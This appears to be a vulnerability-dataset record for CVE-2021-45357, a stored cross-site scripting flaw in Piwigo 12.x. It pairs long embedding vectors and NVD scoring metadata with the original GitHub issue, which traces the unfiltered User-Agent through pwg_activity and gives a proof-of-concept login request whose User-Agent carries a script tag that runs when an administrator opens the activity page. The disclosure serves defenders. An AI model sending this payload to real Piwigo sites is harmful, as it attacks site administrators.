-0.01670079305768013, 0.005524435080587864, 0.018698088824748993, -0.011877535842359066, -0.007164059206843376, -0.010439765639603138, 0.01046101376414299, 0.01886807009577751, 0.0037148285191506147, 0.026389801874756813, 0.020497070625424385, -0.007578391581773758, -0.022012749686837196, -0.010241452604532242, -0.018627261742949486, -0.0018237718613818288, 0.014073144644498825, 0.00111993751488626, 0.010262700729072094, -0.023400940001010895, 0.01922220177948475, 0.0011022310936823487, -0.009979396127164364, 0.0015209902776405215, -0.028911210596561432, -0.014420191757380962, -0.006261026486754417, 0.0008118440746329725, -0.01271328330039978, -0.0002753364387899637, -0.00005090625199954957, -0.007960852235555649, 0.02062455751001835, 0.02476080134510994, -0.009384457021951675, -0.008399974554777145, 0.0030862470157444477, 0.009157813154160976, 0.004444337449967861, -0.008704526349902153, -0.015000966377556324, 0.007847530767321587, 0.003690039273351431, -0.015255940146744251, -0.012741614133119583, 0.005021569784730673, -0.007033030968159437, 0.0005882992409169674, 0.0006994076538830996, 0.01107011828571558, 0.015312600880861282, 0.018825575709342957, 0.033628229051828384, 0.006473504938185215, 0.017621532082557678, -0.03255167230963707, 0.012869101017713547, -0.012507887557148933, -0.009540274739265442, 0.01111261360347271, 0.009717339649796486, -0.009009079076349735, 0.005368617828935385, 0.006735561415553093, -0.015992531552910805, -0.003771489253267646, 0.015185113996267319, 0.014441439881920815, 0.007033030968159437, -0.01997295767068863, -0.010850557126104832, -0.013846500776708126, 0.006693065632134676, -0.0005865285638719797, 0.005935226567089558, -0.01840061880648136, -0.0063601830042898655, -0.004284978378564119, 0.004695769865065813, 0.011211770586669445, -0.01668662764132023, -0.00830081757158041, 0.012125426903367043, 0.03076685406267643, -0.0017060234677046537, 0.004727641586214304, 0.02287682704627514, -0.02731054089963436, -0.011275514028966427, -0.016091687604784966, -0.008357478305697441, 0.010291030630469322, 0.011502156965434551, 0.03170175850391388, 0.02439250610768795, 0.015907540917396545, -0.008662031032145023, -0.00920030940324068, -0.019349688664078712, -0.0034917262382805347, 0.014285622164607048, 0.007613804657012224, 0.008180413395166397, 0.009256970137357712, 0.009858991950750351, -0.015213444828987122, -0.005365076474845409, -0.003056145738810301, 0.020015453919768333, 0.00984482653439045, 0.012819522060453892, -0.008017513900995255, -0.028868714347481728, 0.006445174105465412, -0.0007237541140057147, 0.007776704616844654, 0.0037856546696275473, 0.010121048428118229, 0.009426952339708805, -0.003277477342635393, -0.00036741033545695245, -0.002282370813190937, 0.008244156837463379, 0.00382106751203537, -0.005120726302266121, 0.006027300376445055, -0.004731182940304279, -0.015411757864058018, 0.018046487122774124, 0.014845148660242558, 0.009313630871474743, 0.002856062026694417, -0.0178056787699461, 0.003010108834132552, -0.022919323295354843, -0.011934196576476097, 0.004805550444871187, 0.004982615355402231, -0.014561844058334827, -0.00616895267739892, -0.012869101017713547, 0.021913591772317886, 0.010439765639603138, -0.014335201121866703, 0.012359152548015118, -0.0178056787699461, 0.015553409233689308, -0.018556436523795128, -0.0038918936625123024, -0.00009522789332550019, 0.012090013362467289, 0.0014333430444821715, -0.030880175530910492, -0.005602343939244747, 0.008116669952869415, -0.0031942566856741905, -0.011976691894233227, -0.0100785531103611, 0.012869101017713547, -0.002631189301609993, -0.007022406905889511, 0.012968257069587708, -0.012267079204320908, -0.024052539840340614, -0.0009437576518394053, 0.029491985216736794, 0.012352069839835167, 0.0033040372654795647, -0.019392183050513268, 0.01402356568723917, -0.009972313418984413, 0.004918871913105249, 0.023004313930869102, 0.0056519219651818275, -0.020667053759098053, 0.00018746781279332936, 0.009965230710804462, 0.01631833054125309, 0.018358122557401657, -0.011884618550539017, -0.03105015866458416, 0.01369068305939436, 0.010106883011758327, 0.002477142494171858, 0.0004103486717212945, -0.00014641080633737147, 0.0004807320947293192, -0.0337415486574173, -0.005219882819801569, -0.0010880657937377691, 0.013492370024323463, 0.007280922029167414, 0.00764213502407074, -0.012699117884039879, -0.018443115055561066, 0.00036652502603828907, 0.0038954350166022778, 0.013520700857043266, -0.008392891846597195, 0.019831305369734764, -0.0022841414902359247, -0.00048161743325181305, 0.012628291733562946, -0.001822001184336841, -0.0006666505942121148, -0.023655913770198822, -0.006253943778574467, -0.002539115259423852, 0.005025111138820648, -0.015794217586517334, -0.004851587116718292, -0.017295731231570244, 0.013966904953122139, -0.0025214089546352625, 0.000395076785935089, -0.020284593105316162, 0.011530487798154354, -0.007203013636171818, 0.012904513627290726, 0.02223939262330532, 0.02559654973447323, 0.00717822415754199, -0.01242997869849205, -0.011990857310593128, 0.01650247909128666, -0.0040335459634661674, 0.0023213252425193787, 0.020412079989910126, -0.007164059206843376, -0.006951580755412579, 0.030313566327095032, -0.01810314878821373, 0.011941279284656048, -0.021630289033055305, -0.0061299982480704784, 0.010623913258314133, 0.006384972017258406, -0.009419870562851429, 0.014788487926125526, -0.0014838066417723894, 0.019760480150580406, 0.0029888609424233437, 0.027041401714086533, 0.007231344003230333, -0.010935548692941666, 0.014519348740577698, 0.016530809924006462, -0.007029489614069462, -0.00792543962597847, -0.02130448818206787, 0.010432682931423187, -0.00114384142216295, 0.011806709691882133, 0.010326444171369076, 0.023330114781856537, 0.026304809376597404, -0.011204687878489494, 0.006565578747540712, -0.022097740322351456, -0.009724422357976437, -0.0019494881853461266, 0.00016887596575543284, 0.018513940274715424, 0.01398107036948204, 0.00388126983307302, -0.01177129615098238, -0.01495847012847662, 0.002436417620629072, 0.012507887557148933, -0.0030331274028867483, -0.03020024485886097, -0.009171978570520878, -0.031560108065605164, -0.020808706060051918, -0.011055952869355679, -0.006101667881011963, 0.0009304777486249804, -0.0024647479876875877, 0.006650569848716259, 0.001970736077055335, 0.003029586048796773, 0.0027728413697332144, 0.02270684391260147, -0.003721910994499922, 0.011523405089974403, 0.019463010132312775, 0.041617412120103836, -0.023018479347229004, 0.01866975799202919, 0.008874509483575821, 0.022636018693447113, -0.0037856546696275473, -0.020482905209064484, 0.0062716505490243435, -0.01359860971570015, 0.006537248380482197, -0.010616831481456757, -0.0026453544851392508, -0.01886807009577751, 0.0026772262062877417, 0.03096516616642475, 0.00895950011909008, -0.006912626326084137, 0.0029144936706870794, 0.0051596807315945625, 0.030738523229956627, 0.014292704872786999, 0.007741291541606188, 0.016445819288492203, -0.010439765639603138, -0.014887643977999687, -0.005357993766665459, 0.00350766209885478, 0.00557755446061492, -0.007231344003230333, -0.010758482851088047, 0.012557465583086014, -0.005035735201090574, -0.013074496760964394, -0.005219882819801569, -0.018145645037293434, -0.012295409105718136, 0.00663994625210762, 0.0003151761193294078, -0.00015792004705872387, 0.007670465856790543, 0.007493400480598211, -0.012132509611546993, -0.011572983115911484, -0.007677548099309206, -0.012954091653227806, -0.008605370298027992, 0.0011535799130797386, -0.011955443769693375, -0.0052482131868600845, -0.00016688398318365216, 0.004922413267195225, 0.0002463420096319169, 0.0027604468632489443, 0.0091507313773036, 0.005814821925014257, 0.018230635672807693, 0.01820230484008789, 0.031191810965538025, 0.010949714109301567, -0.0036971219815313816, -0.015610070899128914, -0.015043461695313454, -0.0015395821537822485, 0.0091507313773036, -0.04011589661240578, 0.007295087445527315, 0.014094391837716103, 0.0013970446307212114, 0.0039839674718678, 0.030341897159814835, 0.011884618550539017, -0.0033677807077765465, 0.01331530511379242, -0.004791385028511286, 0.0018644968513399363, -0.00390605884604156, -0.0001860291522461921, -0.00621144799515605, -0.021261991932988167, -0.012819522060453892, -0.010985126718878746, -0.000342399871442467, 0.002965842606499791, 0.018358122557401657, 0.006275191903114319, 0.026970574632287025, 0.015000966377556324, -0.013782757334411144, -0.01905221864581108, 0.01393857505172491, 0.0006737331859767437, 0.008824930526316166, 0.008052926510572433, 0.00044376973528414965, -0.012281244620680809, 0.0047099352814257145, -0.0006856850814074278, -0.009094069711863995, -0.0031818621791899204, 0.025284914299845695, 0.0036546261981129646, -0.00048250274267047644, 0.02626231499016285, 0.007465070113539696, -0.015185113996267319, -0.016658296808600426, 0.003314661094918847, 0.019562166184186935, -0.001988442614674568, 0.004511621780693531, -0.008074174635112286, 0.025369904935359955, 0.03966261073946953, -0.023004313930869102, -0.012238748371601105, -0.02187109738588333, 0.008492047898471355, -0.018924731761217117, -0.02991694025695324, 0.01420771423727274, -0.007783787325024605, 0.008555792272090912, 0.004125619772821665, -0.014788487926125526, -0.01041143573820591, -0.004334556870162487, 0.005545682739466429, -0.00473826564848423, 0.011657974682748318, 0.03665958344936371, -0.028287941589951515, -0.004812632687389851, 0.012585796415805817, -0.023046810179948807, -0.012784109450876713, 0.024647479876875877, 0.006278732791543007, 0.01022728718817234, 0.0022682056296616793, 0.013733179308474064, 0.0065018353052437305, -0.01402356568723917, -0.008662031032145023, 0.003789195790886879, -0.005311956629157066, -0.01651664450764656, 0.00015626006643287838, -0.013414462096989155, -0.0008286652737297118, 0.013166570104658604, -0.0030773936305195093, 0.0215877927839756, -0.02823127992451191, 0.001393503393046558, -0.014887643977999687, 0.0008029908058233559, 0.006756809074431658, -0.0007671351195313036, -0.0006325655267573893, 0.0038777284789830446, -0.030936837196350098, 0.020950358361005783, 0.01145257893949747, 0.014228961430490017, -0.005099478643387556, 0.029435323551297188, -0.00243818829767406, 0.02055373229086399, -0.006608074530959129, 0.008088340051472187, 0.01111969631165266, 0.006742643658071756, 0.030256906524300575, 0.012621209025382996, 0.003576717572286725, 0.009986478835344315, 0.017664026468992233, 0.0040795826353132725, -0.0056837936863303185, -0.023613419383764267, 0.005340287461876869, 0.0007379193557426333, 0.00854162685573101, -0.026531454175710678, -0.011225935071706772, -0.010043139569461346, -0.0014652147656306624, -0.011863370425999165, -0.008924087509512901, 0.005740454886108637, -0.007514648139476776, 0.00929238274693489, -0.0011208228534087539, -0.021035348996520042, 0.015808383002877235, 0.008470800705254078, 0.01603502780199051, 0.012160839512944221, -0.024052539840340614, -0.0003466051712166518, -0.02419419214129448, 0.014901809394359589, -0.020128775388002396, -0.015780054032802582, -0.024463331326842308, 0.003284560050815344, 0.007868778891861439, -0.0015227609546855092, -0.015185113996267319, 0.007776704616844654, 0.01420771423727274, -0.010708904825150967, 0.01397398766130209, -0.024137532338500023, 0.022947654128074646, -0.003521827282384038, -0.020213766023516655, 0.020794540643692017, 0.017338227480649948, 0.005549224093556404, 0.018740583211183548, -0.000926936452742666, -0.0248599573969841, -0.0012837229296565056, -0.012493722140789032, 0.0043062265031039715, 0.006926791742444038, -0.019845470786094666, 0.001019010436721146, -0.030058592557907104, -0.0028135664761066437, -0.0009995332220569253, 0.017324062064290047, 0.006338935345411301, -0.0052907089702785015, 0.01990213245153427, -0.013308222405612469, -0.014002318494021893, 0.010291030630469322, -0.0004727641644421965, -0.0005435902276076376, -0.01735239289700985, -0.00701532419770956, 0.0009052459499798715, 0.0014439669903367758, 0.004777220077812672, 0.05309123918414116, -0.004270813427865505, 0.013740262016654015, -0.014108557254076004, -0.007720043882727623, -0.022961819544434547, -0.007535896264016628, -0.023570923134684563, -0.011608396656811237, 0.02184276655316353, -0.0072667570784688, -0.01818813942372799, 0.01773485355079174, 0.0031181187368929386, 0.007110939361155033, -0.0026294186245650053, 0.001325333258137107, 0.007358830887824297, -0.0072455089539289474, -0.023330114781856537, -0.005092395935207605, 0.002705556573346257, 0.00715343514457345, -0.019066384062170982, -0.008513296023011208, 0.002351426286622882, -0.009320713579654694, 0.0018184599466621876, -0.0028259609825909138, -0.009724422357976437, 0.043657202273607254, -0.013428626582026482, -0.00830790027976036, 0.0032987252343446016, -0.01896722801029682, 0.010638078674674034, 0.035866331309080124, 0.020284593105316162, -0.024180026724934578, -0.014101474545896053, 0.014972635544836521, 0.00324737629853189, -0.0164174884557724, 0.0003253573668189347, 0.002618794795125723, 0.010970961302518845, 0.007358830887824297, 0.01772068813443184, 0.001467870781198144, 0.027650505304336548, 0.003937930800020695, 0.006314145866781473, 0.005489022005349398, 0.009441117756068707, 0.008343313820660114, 0.010156461037695408, 0.01820230484008789, -0.024420836940407753, 0.005687335040420294, -0.018173975870013237, -0.00039861808181740344, -0.02187109738588333, -0.019632993265986443, -0.009349044412374496, -0.011551735922694206, -0.007670465856790543, 0.007727126590907574, 0.010496426373720169, -0.022650184109807014, 0.024604983627796173, 0.008265404962003231, -0.006912626326084137, -0.02025626227259636, -0.008229991421103477, -0.005524435080587864, -0.033628229051828384, 0.019434679299592972, 0.007199472282081842, 0.01524177473038435, -0.010149379260838032, -0.005952932871878147, -0.0037112871650606394, 0.01604919135570526, 0.0067532677203416824, 0.02062455751001835, -0.00663994625210762, 0.0007932521984912455, 0.0020539567340165377, -0.004621402360498905, 0.016672462224960327, 0.021729445084929466, 0.01895306259393692, -0.015000966377556324, 0.005294250324368477, 0.012883266434073448, -0.02437834069132805, -0.0021300946827977896, -0.0107797309756279, 0.0056837936863303185, 0.00863370019942522, 0.0016874315915629268, 0.004642650485038757, -0.009462365880608559, 0.007705878932029009, 0.004784302320331335, 0.0058254459872841835, -0.008895756676793098, -0.010531839914619923, -0.012897430919110775, 0.0046568154357373714, 0.008683279156684875, -0.02082287147641182, -0.014816817827522755, 0.005832528695464134, 0.01706908829510212, 0.005499646067619324, 0.00182908377610147, 0.011735883541405201, 0.013067414052784443, -0.0018945978954434395, 0.004547034855931997, -0.00717822415754199, 0.025950679555535316, 0.012684952467679977, -0.0024983903858810663, -0.007164059206843376, 0.005690876394510269, 0.01876891404390335, 0.011650891974568367, -0.013343635946512222, 0.0015201049391180277, 0.004734724294394255, 0.03393986448645592, 0.007670465856790543, 0.007578391581773758, 0.021729445084929466, -0.021743610501289368, 0.01495847012847662, 0.007854613475501537, 0.002928658854216337, 0.002386839361861348, 0.016955766826868057, 0.012295409105718136, 0.01868392340838909, -0.006052089389413595, 0.01145257893949747, 0.0076492177322506905, 0.021644452586770058, -0.005230506882071495, -0.0037148285191506147, 0.03274998441338539, 0.017749018967151642, 0.005899813491851091, -0.0005365076358430088, 0.000510390498675406, 0.004189363215118647, 0.019378017634153366, 0.02702723629772663, -0.02233854867517948, -0.000777759007178247, -0.023783400654792786, 0.0009632348665036261, -0.00412916112691164, -0.0037962784990668297, 0.020412079989910126, 0.0031269718892872334, 0.007989183068275452, 0.007008241955190897, 0.023471767082810402, 0.00221508601680398, -0.014420191757380962, -0.006225613411515951, 0.01633249595761299, -0.011360504664480686, 0.01621917448937893, 0.01886807009577751, 0.020029619336128235, -0.0009809413459151983, 0.024180026724934578, 0.004125619772821665, 0.017465714365243912, 0.019491340965032578, -0.021177001297473907, 0.000516145140863955, 0.008123752661049366, 0.000017250025848625228, -0.009618183597922325, -0.008435387164354324, 0.027126392349600792, 0.007486317772418261, -0.009256970137357712, -0.00891700480133295, 0.009915652684867382, -0.030313566327095032, -0.008180413395166397, 0.020412079989910126, 0.015638401731848717, -0.007712961174547672, 0.010028974153101444, -0.006076878402382135, 0.028457922860980034, -0.016658296808600426, -0.02589401975274086, 0.024165863171219826 ]
CVE-2021-45357
2022-02-10T18:15:08.383000
Cross Site Scripting (XSS) vulnerability exists in Piwigo 12.x via the pwg_activity function in include/functions.inc.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1582" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDC77171-712D-461F-83B8-953EB077F285", "versionEndExcluding": null, "versionEndIncluding": "12.1.0", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1582
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
I found that piwigo Front-End can trigger xss,it means when the system administrator can trigger xss after logging into the backend Please see below for details of the analysis at first,We found a global filter in `include/common.inc.php` ![1](https://user-images.githubusercontent.com/56486273/146197712-471df1d4-2d90-4a14-aea1-9f25d12414bd.png) it just handle GET, POST, COOKIE,then we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an example(The login is also the same),in `include/functions_user.inc.php` ```php function logout_user() { global $conf; trigger_notify('user_logout', @$_SESSION['pwg_uid']); pwg_activity('user', @$_SESSION['pwg_uid'], 'logout'); $_SESSION = array(); session_unset(); session_destroy(); setcookie(session_name(),'',0, ini_get('session.cookie_path'), ini_get('session.cookie_domain') ); setcookie($conf['remember_me_name'], '', 0, cookie_path(),ini_get('session.cookie_domain')); } ``` After that, let's see what the `pwg_activity` function does in `include/functions.inc.php` in this function,There is no filter parameter `$_SERVER['HTTP_USER_AGENT']` ![2](https://user-images.githubusercontent.com/56486273/146197730-c50fbedc-3493-4578-88f8-d133ff3d0679.png) then execute serialize and pwg_db_real_escape_string functions respectively ![3](https://user-images.githubusercontent.com/56486273/146197780-bb7b5034-9e65-4838-9dec-86f1d888e10b.png) look at function(pwg_db_real_escape_string),it just prevent sql injection ```php function pwg_db_real_escape_string($s) { return mysql_real_escape_string($s); } ``` then we register a user`yyds\yyds` ![4](https://user-images.githubusercontent.com/56486273/146197857-7db7d57f-4fe7-4571-a2aa-f055acf0c318.png) then we click `logout` ![5](https://user-images.githubusercontent.com/56486273/146197874-1fb0bf17-1a84-41d4-ae11-0b1e1442f860.png) then we just post like this,It is best to send more packages ![6](https://user-images.githubusercontent.com/56486273/146197891-df638a27-76c9-472f-97e3-bee9661abdd0.png) ```cmd url:http://test.y4tacker.top/identification.php User-Agent:"><script>alert(`Hacked By Y4tacker`)</script><" POST: username=yyds&password=yyds&redirect=%2F&login=submit ``` Next, after the system administrator has logged in,and visit `http://xxx/admin.php?page=user_activity` ![7](https://user-images.githubusercontent.com/56486273/146197909-92fd89ba-7136-49fc-a13d-e803f8ce8634.png) and look it ![8](https://user-images.githubusercontent.com/56486273/146197926-a858933b-02cb-410f-b992-36d5dd119292.png)
[Version <= 12.1.0]XSS vulnerability in the frontend
https://api.github.com/repos/Piwigo/Piwigo/issues/1582/comments
1
2021-12-15T13:48:11
2022-02-10T23:29:34Z
https://github.com/Piwigo/Piwigo/issues/1582
1,081,062,458
1,582
true
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [Version <= 12.1.0]XSS vulnerability in the frontend Issue date: --- start body --- I found that piwigo Front-End can trigger xss,it means when the system administrator can trigger xss after logging into the backend Please see below for details of the analysis at first,We found a global filter in `include/common.inc.php` ![1](https://user-images.githubusercontent.com/56486273/146197712-471df1d4-2d90-4a14-aea1-9f25d12414bd.png) it just handle GET, POST, COOKIE,then we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an example(The login is also the same),in `include/functions_user.inc.php` ```php function logout_user() { global $conf; trigger_notify('user_logout', @$_SESSION['pwg_uid']); pwg_activity('user', @$_SESSION['pwg_uid'], 'logout'); $_SESSION = array(); session_unset(); session_destroy(); setcookie(session_name(),'',0, ini_get('session.cookie_path'), ini_get('session.cookie_domain') ); setcookie($conf['remember_me_name'], '', 0, cookie_path(),ini_get('session.cookie_domain')); } ``` After that, let's see what the `pwg_activity` function does in `include/functions.inc.php` in this function,There is no filter parameter `$_SERVER['HTTP_USER_AGENT']` ![2](https://user-images.githubusercontent.com/56486273/146197730-c50fbedc-3493-4578-88f8-d133ff3d0679.png) then execute serialize and pwg_db_real_escape_string functions respectively ![3](https://user-images.githubusercontent.com/56486273/146197780-bb7b5034-9e65-4838-9dec-86f1d888e10b.png) look at function(pwg_db_real_escape_string),it just prevent sql injection ```php function pwg_db_real_escape_string($s) { return mysql_real_escape_string($s); } ``` then we register a user`yyds\yyds` ![4](https://user-images.githubusercontent.com/56486273/146197857-7db7d57f-4fe7-4571-a2aa-f055acf0c318.png) then we click `logout` ![5](https://user-images.githubusercontent.com/56486273/146197874-1fb0bf17-1a84-41d4-ae11-0b1e1442f860.png) then we just post like this,It is best to send more packages ![6](https://user-images.githubusercontent.com/56486273/146197891-df638a27-76c9-472f-97e3-bee9661abdd0.png) ```cmd url:http://test.y4tacker.top/identification.php User-Agent:"><script>alert(`Hacked By Y4tacker`)</script><" POST: username=yyds&password=yyds&redirect=%2F&login=submit ``` Next, after the system administrator has logged in,and visit `http://xxx/admin.php?page=user_activity` ![7](https://user-images.githubusercontent.com/56486273/146197909-92fd89ba-7136-49fc-a13d-e803f8ce8634.png) and look it ![8](https://user-images.githubusercontent.com/56486273/146197926-a858933b-02cb-410f-b992-36d5dd119292.png) --- end body ---
2,936
[ -0.03630023077130318, -0.0028296480886638165, -0.0031188232824206352, 0.021441666409373283, 0.06157686561346054, -0.0031052378471940756, 0.015634872019290924, 0.042603861540555954, 0.0119008244946599, 0.01348449569195509, -0.006117318756878376, -0.007460333872586489, -0.0013740677386522293, 0.014920667745172977, -0.005818439181894064, 0.01957852393388748, -0.03338130563497543, -0.005341009236872196, 0.01464895997196436, -0.021100090816617012, -0.017234070226550102, -0.008174538612365723, -0.015037113800644875, 0.03144053369760513, -0.022264555096626282, 0.034002356231212616, 0.00882663857191801, 0.007708752993494272, -0.007995987311005592, 0.002959679812192917, 0.015945395454764366, -0.00014616451517213136, -0.01364751998335123, 0.011854245327413082, 0.019516419619321823, -0.03235657885670662, 0.039840202778577805, 0.06157686561346054, -0.0070411269553005695, 0.02852161042392254, 0.029437655583024025, -0.04570909962058067, -0.016069605946540833, 0.00011626446939771995, -0.012638318352401257, -0.00024829772883094847, 0.001730199670419097, -0.04036809131503105, -0.02847503125667572, 0.034002356231212616, 0.02847503125667572, -0.035958655178546906, 0.0015894935932010412, -0.038318634033203125, -0.02544742450118065, -0.03847389668226242, 0.05275798961520195, -0.012234637513756752, -0.0033109597861766815, 0.011629115790128708, -0.007029482163488865, -0.006975140422582626, 0.019702734425663948, 0.022093767300248146, -0.027931613847613335, 0.040989138185977936, -0.016007501631975174, 0.033878143876791, -0.011955165304243565, 0.02578900009393692, 0.006125081796199083, 0.006090147886425257, 0.03156474232673645, -0.031735531985759735, 0.013034235686063766, -0.013996860012412071, 0.060272667557001114, 0.0040251645259559155, -0.0323876291513443, 0.010674254968762398, -0.038256529718637466, 0.01405896432697773, -0.02959291636943817, 0.003305137623101473, 0.027108727023005486, 0.011567010544240475, -0.051360633224248886, -0.08812665194272995, 0.019097212702035904, -0.026736097410321236, 0.0003580727498047054, 0.02577347494661808, -0.01771538145840168, -0.031067904084920883, -0.0007627240265719593, 0.006474420893937349, 0.004642330575734377, -0.005356535315513611, -0.013197260908782482, 0.026736097410321236, -0.02613057568669319, -0.01887984573841095, -0.030167385935783386, -0.007972697727382183, 0.03741811588406563, 0.01928352750837803, -0.0014672249089926481, -0.025618212297558784, -0.019004056230187416, 0.10874542593955994, 0.015828950330615044, -0.010891621932387352, -0.04816224053502083, 0.01731170155107975, 0.006858693901449442, 0.04043019562959671, -0.026751624420285225, -0.02732609212398529, -0.026705045253038406, 0.012203584425151348, -0.0408959835767746, -0.035244449973106384, 0.02349112369120121, 0.013554363511502743, -0.02890976518392563, 0.04530541971325874, -0.017591172829270363, 0.006078503094613552, -0.02344454638659954, -0.010922674089670181, -0.022264555096626282, -0.03772864118218422, 0.01112451497465372, 0.0015322407707571983, -0.0028839895967394114, 0.015324348583817482, -0.005224562715739012, 0.03350551798939705, 0.018243271857500076, -0.012312267906963825, -0.04418753460049629, -0.01891089789569378, -0.00491792056709528, 0.0009519494487904012, -0.03204605355858803, -0.009401107206940651, 0.011877534911036491, -0.02195403166115284, -0.041361767798662186, 0.014555802568793297, -0.017994852736592293, -0.012273452244699001, 0.0036874699871987104, 0.03689022734761238, 0.011171093210577965, -0.007188625633716583, 0.020991407334804535, 0.04456016421318054, -0.02505926974117756, -0.02844397909939289, -0.0033905315212905407, -0.032884467393159866, 0.026875833049416542, -0.009905708953738213, 0.008617035113275051, -0.032511841505765915, 0.01585223898291588, 0.013205023482441902, -0.010899384506046772, 0.012692660093307495, -0.012017270550131798, -0.030307121574878693, 0.0010994483018293977, -0.0027093200478702784, -0.029033973813056946, 0.0034623402170836926, 0.0204479917883873, -0.0346234031021595, -0.029127130284905434, -0.029422128573060036, -0.004882986657321453, 0.004110558424144983, -0.044001221656799316, -0.021814296022057533, 0.02774530090391636, -0.01572803035378456, 0.02853713557124138, -0.03887757658958435, 0.014788695611059666, -0.01582118682563305, -0.033660776913166046, -0.004250294528901577, 0.015130271203815937, -0.03589655086398125, -0.010464651510119438, 0.0012052204692736268, -0.018988529220223427, -0.03592760115861893, 0.0599931962788105, -0.012288978323340416, 0.056763749569654465, 0.003406057832762599, -0.0030664224177598953, -0.018662478774785995, -0.025618212297558784, 0.03549286723136902, -0.013624231331050396, 0.007627240382134914, -0.042914386838674545, -0.02007536217570305, -0.03316393867135048, -0.006815996952354908, 0.011807667091488838, 0.028009245172142982, -0.04350438341498375, 0.016845915466547012, 0.009408870711922646, -0.014516986906528473, 0.007930001243948936, -0.006839286535978317, 0.029437655583024025, -0.030213965103030205, -0.04841065779328346, -0.014431593008339405, -0.027900561690330505, -0.019314579665660858, -0.007747568190097809, 0.013950280845165253, -0.024966111406683922, -0.008360852487385273, 0.004029046278446913, -0.03890863060951233, -0.018973004072904587, 0.009540842846035957, 0.006381263956427574, -0.051764313131570816, -0.017466962337493896, 0.013352522626519203, -0.007052771281450987, -0.007157573010772467, 0.026875833049416542, 0.027869509533047676, 0.0073671769350767136, 0.01572803035378456, 0.042169131338596344, 0.04664067178964615, -0.03344340994954109, -0.002476427238434553, -0.012824632227420807, 0.008873216807842255, -0.0007336124544963241, 0.01583671383559704, -0.003825264982879162, -0.013740677386522293, -0.0029635613318532705, -0.010371494106948376, 0.013507784344255924, -0.0006302662659436464, -0.04092703387141228, 0.0040057566948235035, 0.03881547227501869, 0.00463844882324338, -0.037914954125881195, 0.035523921251297, 0.01964063011109829, -0.0017369923880323768, 0.018771162256598473, 0.00027025272720493376, 0.006777181755751371, -0.054496925324201584, 0.04120650514960289, 0.004269701894372702, -0.0022221857216209173, -0.03425077348947525, -0.005729163996875286, -0.0022183042019605637, 0.0008854779880493879, 0.02311849594116211, 0.005092590115964413, 0.021659033372998238, 0.007600069511681795, 0.015813423320651054, -0.0005215829005464911, 0.014734353870153427, 0.059247937053442, 0.002732609398663044, 0.009199267253279686, -0.006536525674164295, -0.0005798061029054224, 0.035958655178546906, -0.021829821169376373, -0.0018922543385997415, -0.053347986191511154, -0.03695233166217804, 0.009727157652378082, 0.06008635088801384, 0.019873522222042084, 0.031782109290361404, -0.011830955743789673, -0.004432727117091417, -0.006381263956427574, 0.017094334587454796, -0.05247851833701134, 0.021115617826581, -0.04067861661314964, 0.010736360214650631, 0.025199005380272865, 0.043628592044115067, -0.00825993251055479, -0.0392502062022686, 0.049155913293361664, -0.041051242500543594, -0.009385581128299236, -0.031828686594963074, -0.028040297329425812, 0.003939770627766848, 0.006858693901449442, -0.0030140215530991554, 0.012032796628773212, -0.017249595373868942, -0.008780060335993767, -0.008500589057803154, -0.03303973004221916, 0.004549173638224602, 0.004149374086409807, 0.010883858427405357, -0.032542891800403595, -0.03040027804672718, -0.024562431499361992, 0.002713201567530632, 0.018584849312901497, -0.014338435605168343, -0.0070877051912248135, -0.012257926166057587, -0.04129966348409653, -0.05667059123516083, -0.0017816302133724093, 0.05347219482064247, 0.012669370509684086, -0.006850930862128735, -0.012591739185154438, -0.0030974748078733683, -0.015238954685628414, 0.006257054395973682, 0.02920476160943508, -0.007836843840777874, 0.008896506391465664, -0.0138804130256176, 0.05362745746970177, -0.030726328492164612, 0.0009514642879366875, -0.0013585415435954928, 0.0017583409789949656, 0.03241868317127228, -0.010876095853745937, -0.003990230616182089, 0.010518993251025677, -0.011085699312388897, -0.006606393493711948, 0.002967442851513624, 0.0347786620259285, -0.017575645819306374, 0.02113114297389984, 0.027621090412139893, 0.03499602898955345, -0.005733045283704996, -0.018802214413881302, 0.007204151712357998, -0.0016758580459281802, -0.014540276490151882, -0.03723180294036865, 0.006928561720997095, -0.019159317016601562, 0.006361856125295162, -0.03356762230396271, -0.00020899706578347832, -0.004782066214829683, 0.011784377507865429, -0.04623699188232422, 0.02892529033124447, -0.01616276241838932, 0.00170885119587183, -0.02999659813940525, -0.02074298821389675, 0.023568755015730858, -0.00499555142596364, 0.020975882187485695, -0.008601509034633636, 0.03150263801217079, -0.030648697167634964, -0.006827641744166613, 0.0747741237282753, -0.03004317544400692, -0.07918356359004974, -0.02623925916850567, 0.006474420893937349, -0.045243315398693085, -0.03803916275501251, 0.02085167169570923, -0.015945395454764366, 0.03555497154593468, 0.007161454763263464, -0.0030314885079860687, -0.0014895438216626644, -0.02467111498117447, 0.009928997606039047, 0.03807021677494049, 